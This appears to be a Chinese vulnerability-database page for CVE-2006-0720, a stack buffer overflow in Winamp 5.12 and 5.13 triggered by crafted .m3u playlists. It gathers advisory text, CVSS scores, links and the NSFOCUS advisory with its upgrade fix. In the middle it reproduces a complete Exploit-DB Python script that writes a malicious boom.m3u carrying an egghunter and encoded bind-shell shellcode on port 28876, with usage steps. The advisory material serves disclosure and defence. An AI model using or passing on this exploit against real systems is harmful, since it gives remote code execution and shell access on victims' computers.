CVE-2006-0720
CVSS7.6
发布时间 :2006-02-23 16:02:00
修订时间 :2008-09-05 17:00:02
NMCOEPS    

[原文]Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file.


[CNNVD]Nullsoft Winamp M3U文件处理静态缓冲区溢出漏洞(CNNVD-200602-365)

        Winamp是一款流行的媒体播放器,支持多种文件格式。
        Winamp在处理.m3u列表文件中的条目时存在缓冲缓冲区溢出漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。
        Winamp可以通过加载.m3u列表文件来播放其中的文件,当某个文件播放停止时,Winamp会重新设置程序标题。这时Winamp错误地使用了strncpy()函数,导致一个静态缓冲区溢出。攻击者通过构造恶意的.m3u播放文件,可能导致被攻击用户的winamp崩溃,远程代码执行也是有可能的。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:winamp:5.12Nullsoft Winamp 5.12
cpe:/a:nullsoft:winamp:5.13Nullsoft Winamp 5.13

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0720
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0720
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-365
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16785
(PATCH)  BID  16785
http://securitytracker.com/id?1015675
(PATCH)  SECTRACK  1015675
http://www.securityfocus.com/archive/1/archive/1/425888/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060223 NSFOCUS SA2006-01 : Winamp m3u File Processing Buffer Overflow Vulnerability
http://www.nsfocus.com/english/homepage/research/0601.htm
(UNKNOWN)  MISC  http://www.nsfocus.com/english/homepage/research/0601.htm
http://forums.winamp.com/showthread.php?threadid=238648
(UNKNOWN)  CONFIRM  http://forums.winamp.com/showthread.php?threadid=238648
http://xforce.iss.net/xforce/xfdb/24740
(UNKNOWN)  XF  winamp-m3u-wma-bo(24740)
http://securityreason.com/securityalert/476
(UNKNOWN)  SREASON  476

- 漏洞信息

Nullsoft Winamp M3U文件处理静态缓冲区溢出漏洞
高危 缓冲区溢出
2006-02-23 00:00:00 2007-02-27 00:00:00
远程  
        Winamp是一款流行的媒体播放器,支持多种文件格式。
        Winamp在处理.m3u列表文件中的条目时存在缓冲缓冲区溢出漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。
        Winamp可以通过加载.m3u列表文件来播放其中的文件,当某个文件播放停止时,Winamp会重新设置程序标题。这时Winamp错误地使用了strncpy()函数,导致一个静态缓冲区溢出。攻击者通过构造恶意的.m3u播放文件,可能导致被攻击用户的winamp崩溃,远程代码执行也是有可能的。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.winamp.com/player

- 漏洞信息 (26245)

Winamp 5.12 (.m3u) - Stack Based Buffer Overflow (EDBID:26245)
2013-06-17 Not Verified
superkojiman
[点击下载] [点击下载]
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 
# allows user-assisted attackers to cause a denial of service 
# (crash) and possibly execute arbitrary code via a crafted 
# .m3u file that causes an incorrect strncpy function call 
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window 
# 3. Check for bind shell on port 28876
#

import struct

header =  "#EXTM3U\n"
header += "#EXTINF:1234,Pwnage Rock\n"

# NTDisplayString
egghunter = (
"\x90" * 64 +
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +
"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
"\x77\x30\x30\x74" + # w00t
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +
"\x90" * 30
)

junk = "\x41" * 262 + "\x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
"w00tw00t" + "\x90" * 239 + 
"\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
"\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
"\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
"\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
"\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
"\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
"\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
"\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
"\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
"\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
"\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
"\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
"\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
"\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
"\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
"\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
"\x44\x83\x55"
)

# 022B368C , call ecx , C:\Progam Files\Winamp\pxsdkpls.dll
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp 
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but 
# this is what the fuzzer found first so...
wtf = "\x43\x43\x43\xB0"

f = open("boom.m3u", "w")
f.write(header + junk + shellcode + ret + wtf)
f.close()

print "Created boom.m3u"
print "1. Open Winamp"
print "2. Drag boom.m3u into Winamp window"
print "3. Check for bind shell on port 28876"		

- 漏洞信息 (F44166)

NSFOCUS Security Advisory 2006.1 (PacketStormID:F44166)
2006-02-26 00:00:00
NSFOCUS,Liu Yexin  nsfocus.com
advisory,overflow,arbitrary
CVE-2006-0720
[点击下载]

NSFOCUS Security Advisory - The NSFocus Security Team has discovered a buffer overflow vulnerability when Winamp processes .m3u files, which might cause Winamp to crash or even execute arbitrary code when a user loads a malicious .m3u file and plays it. Affected software includes Nullsoft Winamp version 5.12 and 5.13.

NSFOCUS Security Advisory (SA2006-01)

Winamp m3u File Processing Buffer Overflow Vulnerability

Release Date: 2006-02-23

CVE ID: CVE-2006-0720

http://www.nsfocus.com/english/homepage/research/0601.htm

Affected systems & software
===========================

Nullsoft Winamp 5.12
Nullsoft Winamp 5.13

Unaffected systems & software
=============================

Nullsoft Winamp 5.2

Summary
=========

Winamp is a popular media player that supports various media formats and 
playlist formats, including m3u and pls formats.

NSFocus Security Team discovered a buffer overflow vulnerability when Winamp 
processes .m3u files, which might cause Winamp to crash or even execute 
arbitrary code when a user load a malicious .m3u file and play. 

Description
============

Winamp can play files by loading .m3u file. When the playing is paused or stopped,
Winamp will reset the title of the program, where function strncpy() is incorrectly
called, resulting in a static buffer overflow.

An attacker can cause winamp to crash by crafting a malicious .m3u file. 
Remote code execution is possible but difficult.

Workaround
=============

Cancel .m3u file association to Winamp, and do not open untrusted .m3u files. 

Vendor Status
==============

2006.02.13  Informed the vendor.
2006.02.15  The vendor confirmed the vulnerability.
2006.02.21  The vendor releases a new version to fix the vulnerability.

The vendor has released Winamp 5.2 to fix this vulnerability, which is available 
for download at:
http://www.winamp.com/player/
http://forums.winamp.com/showthread.php?threadid=238648

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0720 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

Liu Yexin of NSFocus Security Team found the vulnerability.

DISCLAIMS
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
    

- 漏洞信息

23525
Winamp M3U File Handling Stop/Pause Stack Buffer Overflow
Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-02-23 Unknow
Unknow 2006-02-21

- 解决方案

Upgrade to version 5.2 or higher, as it has been reported to fix this vulnerability. It is also possible to temporarily work around the flaw by implementing the following workaround: Cancel .m3u file association to Winamp, and do not open untrusted .m3u files.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Nullsoft Winamp M3U File Processing Buffer Overflow Vulnerability
Boundary Condition Error 16785
Yes No
2006-02-23 12:00:00 2006-02-24 08:32:00
Discovered by Liu Yexin of NSFocus Security Team and P Robinson.

- 受影响的程序版本

NullSoft Winamp 5.13
NullSoft Winamp 5.12
NullSoft Winamp 5.2

- 不受影响的程序版本

NullSoft Winamp 5.2

- 漏洞讨论


Nullsoft Winamp is prone to a buffer-overflow vulnerability when processing malformed M3U files. The overrun occurs when the M3U playlist is paused or stopped.

This issue is reported to affect Winamp versions 5.12 and 5.13. Earlier versions may also be vulnerable.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 解决方案


This issue has been addressed in Winamp 5.2:


NullSoft Winamp 5.12

NullSoft Winamp 5.13

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站